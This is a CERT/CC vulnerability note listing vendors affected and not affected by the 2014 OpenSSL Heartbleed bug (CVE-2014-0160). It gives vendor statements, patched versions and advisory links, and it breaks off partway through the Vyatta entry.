Extreme Networks\n\nNotified: April 08, 2014 Updated: April 16, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nThe following products and versions are affected by the VU#720951 OpenSSL vulnerability.\n\nExtremeXOS version 15.4.1.x - A patch update for ExtremeXOS 15.4.1.3-patch1-10 or higher is available for download \n \n64 bit (Ubuntu) NetSight Appliance version 4.4, 5.0, 5.1 and 6.0 - A patch update is currently available for 4.4, 5.0, 5.1 and 6.0 \n \n64 bit (Ubuntu) NAC Appliance version 5.0, 5.1 and 6.0 - A patch update is currently available for 5.0, 5.1 and 6.0. \n \n64 bit (Ubuntu) Purview Appliance version 6.0 - A patch update is currently available. \n \nNote: Please contact the Extreme Networks Global Technical Assistance Center (GTAC) for access to the patch in the event not found on the Extreme Networks support site. \n \nExtreme Networks has also published the below advisory on its website. Please refer the same for additional information. \n<http://learn.extremenetworks.com/rs/extreme/images/CERT_VU%23720951_Vulnerability_Advisory_04_11_2014v2.pdf>\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://learn.extremenetworks.com/rs/extreme/images/CERT_VU%23720951_Vulnerability_Advisory_04_11_2014v2.pdf>\n\n### __ F5 Networks, Inc.\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217>\n\n### __ Fedora Project\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://rhn.redhat.com/errata/RHSA-2014-0376.html>\n\n### __ __ Fortinet, Inc.\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe have determined that the following products are vulnerable:\n\nFortiGate (FortiOS) 5.0 and higher \nFortiAuthenticator 3.0 and higher \nFortiMail 5.0 and higher \nFortiVoice (all versions) \nFortiRecorder (all versions)\n\n### Vendor References\n\n * <http://www.fortiguard.com/advisory/FG-IR-14-011/>\n\n### __ __ FreeBSD Project\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nFreeBSD 10.0-RELEASE, 10.0-STABLE and 11.0-CURRENT have been patched\n\nfor this issue (CVE-2014-0160/VU #720951), both in source and binary \n(via freebsd-update) forms. Earlier FreeBSD releases are not affected \nby this issue.\n\n### Vendor References\n\n * <http://www.freebsd.org/security/advisories/FreeBSD-SA-14:06.openssl.asc>\n\n### __ Gentoo Linux\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.gentoo.org/security/en/glsa/glsa-201404-07.xml>\n\n### __ __ Global Technology Associates, Inc.\n\nNotified: April 08, 2014 Updated: April 23, 2014 \n\n**Statement Date: April 23, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nWe have determined that GTA firewalls running the following versions of GB-OS are vulnerable and should be upgraded to the indicated version.\n\nGB-OS version 6.1.0 to 6.1.5 are vulnerable and should upgrade to GB-OS 6.1.6 \nGB-OS version 6.0.0 to 6.0.7 are vulnerable and should upgrade to GB-OS 6.0.8 \n \nCustomers using GTA firewalls with an unsupported version of GB-OS should upgrade to a currently supported version.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Google\n\nNotified: April 08, 2014 Updated: April 23, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://googleonlinesecurity.blogspot.com/2014/04/google-services-updated-to-address.html>\n * <https://groups.google.com/forum/?_escaped_fragment_=topic/mod-spdy-discuss/EwCowyS1KTU#!topic/mod-spdy-discuss/EwCowyS1KTU>\n\n### Addendum\n\nmod_spdy is affected, as are some versions of the Google Search Appliance GSA 7.0.14.G.212 addresses this issue.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ Hewlett-Packard Company\n\nNotified: April 08, 2014 Updated: May 02, 2014 \n\n**Statement Date: April 14, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://h17007.www1.hp.com/docs/advisories/HPNetworkingSecurityAdvisory-OpenSSL-HeartbleedVulnerability.pdf>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236102>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236062>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239372>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04240206>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04242672>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239374>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04250814>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04248997>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04255796>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260353>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260456>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260505>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04262472>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04262670>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04261644>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375>\n\n### __ __ Hitachi\n\nNotified: April 08, 2014 Updated: May 27, 2014 \n\n**Statement Date: April 16, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n`Hitachi has published the below advisory on its website. Please refer \nthe advisory for additional information. This advisory includes \nHitachi products for Industrial Control Platform. \n \nHIRT-PUB14005: OpenSSL TLS heartbeat extension read overrun issue in \nHitachi products (VU#720951, CVE-2014-0160) \n<http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html>`\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html>\n\n### __ IBM Corporation\n\nNotified: April 08, 2014 Updated: April 15, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc>\n * [http://www-01.ibm.com/support/docview.wss?&uid=swg21669774](<http://www-01.ibm.com/support/docview.wss?&uid=swg21669774>)\n\n### __ Intel Corporation\n\nNotified: April 08, 2014 Updated: April 15, 2014 \n\n**Statement Date: April 15, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00037&languageid=en-fr](<https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00037&languageid=en-fr>)\n\n### __ Juniper Networks, Inc.\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://kb.juniper.net/JSA10623>\n\n### __ Mandriva S. A.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ MarkLogic Corporation\n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n`Recently a serious security vulnerability was discovered in the OpenSSL \ncryptographic software \nlibrary. MarkLogic application servers can be configured to use SSL, and \nMarkLogic uses OpenSSL to \nprovide this capability. A patch to OpenSSL has been released to address \nthis vulnerability, and \nMarkLogic has built patches for all impacted MarkLogic versions with \nOpenSSL 1.0.1g to incorporate \nthis new fix. \n \n \n \nImpacted Versions \n \n \n \nThe following versions of MarkLogic are impacted by this vulnerability: \n \n\u00b7 MarkLogic 5.0-5 through 5.0-6 \n \n\u00b7 All versions of MarkLogic 6.0 (6.0-1 through 6.0-5) \n \n\u00b7 All versions of MarkLogic 7.0 (7.0-1 through 7.0-2.2), \nincluding the MarkLogic AMIs \n \n \n \nMarkLogic versions prior to 5.0-5 use an earlier version of OpenSSL that \ndoes not have this \nvulnerability. \n \n \n \nHow to Patch \n \n \n \nWe recommend that customers who are using SSL patch their systems \nimmediately. To do this: \n \n1. Upgrade your cluster to the patch release, available at \n<http://developer.marklogic.com/products>. \n \nPatch release versions are as follows: \n \no MarkLogic 5.0-6.1 \n \no MarkLogic 6.0-5.1 \n \no MarkLogic 7.0-2.3 \n \n2. Regenerate all SSL certificates for your cluster. This is \nnecessary because the \nvulnerability is such that private keys for your certificates are \npotentially compromised. See \n\ud840\uddcconfiguring SSL on App Servers\u201d in the documentation: \n \no MarkLogic 5 documentation: \n<http://docs.marklogic.com/5.0/guide/admin/SSL#chapter> \n \no MarkLogic 6 documentation: \n<http://docs.marklogic.com/6.0/guide/admin/SSL#chapter> \n \no MarkLogic 7 documentation: \n<http://docs.marklogic.com/guide/admin/SSL#chapter> \n \n3. If you are using BASIC or Application Level Authentication over \nSSL, have all your \nusers change their passwords after you've patched and deployed new SSL \ncertificates. This includes \nboth internal users in our security database, and anyone using external \nauthentication (which \nrequires BASIC authentication over SSL). This is necessary because the \nvulnerability may have \nresulted in password leaks. \n \n \n \nIf you have any questions about how to patch, feel free to contact \nsupport@marklogic.com. \n \n \n \nMore information about the heartbleed vulnerability can be found at \n<http://heartbleed.com> or \n<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>.`\n\n### __ McAfee\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 11, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=SB10071](<https://kc.mcafee.com/corporate/index?page=content&id=SB10071>)\n\n### __ __ NVIDIA\n\nUpdated: May 05, 2014 \n\n**Statement Date: May 05, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n<http://nvidia.custhelp.com/app/answers/detail/a_id/3492>\n\n### __ __ NetBSD\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nNetBSD is vulnerable (in the version 6 train, not in the version 5 train) pkgsrc is vulnerable (1.0.1 versions of OpenSSL packages below 1.0.1g, no surprises there)\n\n### Vendor References\n\n * <http://mail-index.netbsd.org/security-announce/2014/04/08/msg000085.html>\n\n### __ OpenBSD\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.5/common/002_openssl.patch.sig>\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.4/common/007_openssl.patch>\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.3/common/014_openssl.patch>\n\n### __ OpenSSL\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.openssl.org/news/secadv_20140407.txt>\n\n### __ OpenVPN Technologies\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://community.openvpn.net/openvpn/wiki/heartbleed>\n\n### __ Oracle Corporation\n\nNotified: April 08, 2014 Updated: April 16, 2014 \n\n**Statement Date: April 16, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>\n\n### __ Red Hat, Inc.\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/CVE-2014-0160>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0160>\n * <https://rhn.redhat.com/errata/RHSA-2014-0376.html>\n\n### __ Slackware Linux Inc.\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.533622](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.533622>)\n\n### __ Sophos, Inc.\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://blogs.sophos.com/2014/04/09/sophos-utm-manager-and-openssl-vulnerability/>\n\n### __ Symantec\n\nNotified: April 08, 2014 Updated: May 13, 2016 \n\n**Statement Date: April 18, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.symantec.com/outbreak/?id=heartbleed>\n * <http://www.symantec.com/content/en/us/enterprise/other_resources/b-symantec-product-list-heartbleed.pdf>\n * [https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00](<https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00>)\n\n### Addendum\n\nCERT/CC has confirmed with Symantec that Symantec Messaging Gateway version 10.6.1 is vulnerable. Please see the most recent Symantec advisory (`SYM16-007`) above.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ Ubuntu\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-2165-1/>\n * <https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1304042>\n\n### Addendum\n\nNote that the version number reported by openssl does not reflect the patch level. To verify that the usn-2165-1 fixed versions are installed, run the following command \n`dpkg -l openssl libssl* | cat` \nand compare the reported version numbers with those listed in the advisory.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ __ Unisys\n\nNotified: April 08, 2014 Updated: April 17, 2014 \n\n**Statement Date: April 17, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n**Heartbleed bug \u2013 Public and Client Communication**\n\nDear Unisys client,\n\nUnisys prides itself on ensuring the mission-critical operations of our clients \u2013 and the security of your systems is a priority for us. I am writing to let you know how we are addressing any risks related to the Heartbleed bug that has been reported in the news and to provide you with information that may help you address your own risks.\n\nHeartbleed is a software bug in the OpenSSL technology used to create a secure link over the Internet between a server and a computer asset such as a laptop or PC. The bug, which has existed for about two years but was only publicly disclosed last week, is believed to have affected a significant number of websites globally. \n\nUnisys has undertaken a comprehensive review of our servers, products, and client-owned servers under our management for risks associated with the Heartbleed bug. Here\u2019s what you need to know:\n\n-We have not found any vulnerability in our public-facing Web servers. We continue to monitor the product advisories of our major vendors for any potential issues. \n\n\n-The vast majority of our released products, including MCP, OS 2200, Forward!, Stealth, and Choreographer, are not vulnerable to the Heartbleed bug. Two instances of potential vulnerabilities were found in add-on products; in those cases, we have done remediation efforts and notified clients. \n\n\n-The vast majority of client-owned servers under our management are not affected by the Heartbleed bug. For servers that may have been affected, we have notified the client and after consulting with the client, we are in the process of patching those servers, changing the server side certificates and instructing users to change their passwords. \n\n\n-Currently, only version 1.0.1 - 1.0.1f of the open-source SSL is affected. We have upgraded any client-owned servers under our management to version 1.0.1g. We recommend that you check the other servers that you manage. \n\n\n-Our Security Services team can help you in this process and can also perform a penetration test to determine if you are vulnerable and help you contain any resulting damage.\n\nWe stand ready to assist you. Please contact your Unisys representative or service delivery manager to discuss your requirements or to order a penetration test.\n\nWe appreciate your business.\n\nUnisys\n\n### __ __ VMware\n\nNotified: April 08, 2014 Updated: April 22, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nVMware has released product updates and patches for all affected products\n\nlisted in VMware Knowledge Base article 2076225.\n\n### Vendor Information\n\nVMware Security Advisory VMSA-2014-0004 lists the updated products and \npatch releases that address CVE-2014-0160 in VMware products and provides \nreferences to specific product documentation.\n\n### Vendor References\n\n * <http://www.vmware.com/security/advisories/VMSA-2014-0004.html>\n * <http://kb.vmware.com/kb/2076225>\n\n### __ Watchguard Technologies, Inc.\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://watchguardsecuritycenter.com/2014/04/08/the-heartbleed-openssl-vulnerability-patch-openssl-asap/>\n\n### __ __ Wind River Systems, Inc.\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWind River has investigated its products regarding the heart blead vulnerability. The conclusion is:\n\nVxWorks is not vulnerable. \nWR Linux 3.x and 4.x are not vulnerable. \nWR Linux 5.0.1.x is vulnerable if the optional openssl-1.0.1 package is installed. \nWR Linux 6.0.0.x is vulnerable. \nINP 3.4 is vulnerable. \n \nWind River customers can find additional information, e.g. fixes, at the online support web site <https://support.windriver.com/>\n\n### Vendor References\n\n * <https://support.windriver.com/>\n\n### __ nginx\n\nUpdated: April 11, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://nginx.com/blog/nginx-and-the-heartbleed-vulnerability/>\n\n### Addendum\n\nnginx for Windows is statically linked with the OpenSSL library. We have confirmed that nginx versions 1.2.9 through 1.4.7 on Windows provide a vulnerable OpenSSL version.\n\nnginx 1.4.7, which was originally released on March 18, 2014, was silently repackaged with OpenSSL 1.0.1g on April 8, 2014. \nnginx 1.5.13 was officially released on April 8, 2014, and it also includes OpenSSL 1.0.1g, despite not specifically mentioning this vulnerability.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ openSUSE project\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html>\n\n### __ pfSENSE\n\nUpdated: April 17, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://blog.pfsense.org/?p=1253>\n\n### __ __ Brocade\n\nUpdated: April 11, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n`TECHNICAL SUPPORT BULLETIN \nApril 10, 2014 \n________________________________________ \nTSB 2014-185-ASEVERITY: Low - Information \n________________________________________ \nPRODUCTS AFFECTED: \nAll Brocade products, including Vyatta \n \nCORRECTED IN RELEASE: \nAll current releases of Brocade products, including Vyatta \n \nBULLETIN OVERVIEW \n \nThe purpose of this bulletin is to provide information regarding the recently \ndisclosed vulnerability in the OpenSSL protocol documented by CVE-2014-0160 and \nalso known as \"The Heartbleed bug.\" This vulnerability takes advantage of the \nheartbeat extensions to the OpenSSL protocol (RFC6520). \n \nBrocade's family of IP products ADX, FCX, ICX, MLX, MLX-E, XMR CES, CER, RX, \nSX, VDX offering ServerIron, FastIron, NetIron, RX, Network OS, Brocade Network \nAdvisor, Vyatta and vADX software and SAN products offering FOS software do not \nmake use of the heartbeat extensions and hence are not vulnerable to the \nexploit documented in CVE-2014-0160. \nIn addition, the MyBrocade.com web site does not use OpenSSL and is not \nvulnerable to this issue. \n \n \nPROBLEM STATEMENT \nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not \nproperly handle Heartbeat Extension packets, which allows remote attackers to \nobtain sensitive information from process memory via crafted packets that \ntrigger a buffer over-read, as demonstrated by reading private keys, related to \nd1_both.c and t1_lib.c, aka the Heartbleed bug. \n<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160> \n \nRISK ASSESSMENT \nThere is no risk using Brocade products \nSYMPTOMS \nNot applicable. \nWORKAROUND \nNo workaround is necessary. \nCORRECTIVE ACTION \nNot applicable.`\n\n### __ __ EfficientIP\n\nUpdated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nOur system uses FreeBSD 9.2 as basis, and the OpenSSL version shipped with this version (0.9.8y) are stated not be affected.\n\n### __ __ Foundry Networks, Inc.\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nNo Brocade (Foundry) products are affected by this vulnerability,\n\n### Addendum\n\nFoundry was purchased by Brocade.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ __ Infoblox\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nInfoblox is not affected by this issue (in any released version).\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Microsoft Corporation\n\nNotified: April 08, 2014 Updated: April 21, 2014 \n\n**Statement Date: April 21, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nMicrosoft Services unaffected by OpenSSL \u201cHeartbleed\u201d vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx>\n\n### __ Opengear\n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://opengear.zendesk.com/entries/51667116-CVE-2014-0160-aka-Heartbleed-Opengear-products-are-not-affected>\n\n### __ __ Openwall GNU/*/Linux\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux is not affected. The versions of OpenSSL that we redistribute do not contain the vulnerable code.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Peplink\n\nNotified: April 08, 2014 Updated: April 18, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nPeplink products are NOT affected by this vulnerability.\n\n### Vendor References\n\n * <https://forum.peplink.com/threads/3062-Special-Notice-On-OpenSSL-Heartbleed-Vulnerability>\n\n### __ __ Quagga\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nQuagga is not affected by this vulnerability.\n\n### __ SUSE Linux\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html>\n\n### Addendum\n\nSUSE Enterprise Linux uses OpenSSL 0.9.x\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ __ Vyatta\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n`TECHNICAL SUPPORT BULLETIN \nApril 10, 2014 \n________________________________________ \nTSB 2014-185-ASEVERITY: Low - Information \n________________________________________ \nPRODUCTS AFFECTED: \nAll Brocade products, including Vyatta \n \nCORRECTED IN RELEASE: \nAll current releases of Brocade products, including Vyatta \n \nBULLETIN OVERVIEW \n \nThe purpose of this bulletin is to provide information regarding the recently \ndisclosed vulnerability in the OpenSSL protocol documented by CVE-2014-0160 and \nalso known as \"The Heartbleed bug.\" This vulnerability takes advantage of the \nheartbeat extensions to the OpenSSL protocol (RFC6520). \n \nBrocade's family of IP products ADX, FCX, ICX, MLX, MLX-E, XMR CES, CER, RX, \nSX, VDX offering ServerIron, FastIron, NetIron, RX, Network OS, Brocade Network \nAdvisor, Vyatta and vADX software and SAN products offering FOS software do not \nmake use of the heartbeat extensions and hence are not vulnerable to the \nexploit documented in CVE-2014-0160. \nIn addition, the MyBrocade.com web site does not use OpenSSL and is not \nvulnerable to this issue. \n \n \nPROBLEM STATEMENT \nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not \nproperly handle Heartbeat Extension packets, which allows remote attackers to \nobtain sensitive information from process memory via crafted packets that \ntrigger a buffer over-read, as demonstrated by reading private keys, related to \nd1_both.c and t1_lib.c, aka the Heartbleed bug. \n``<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>`` \n \nRISK ASSESSMENT \nThere is no risk using Brocade products 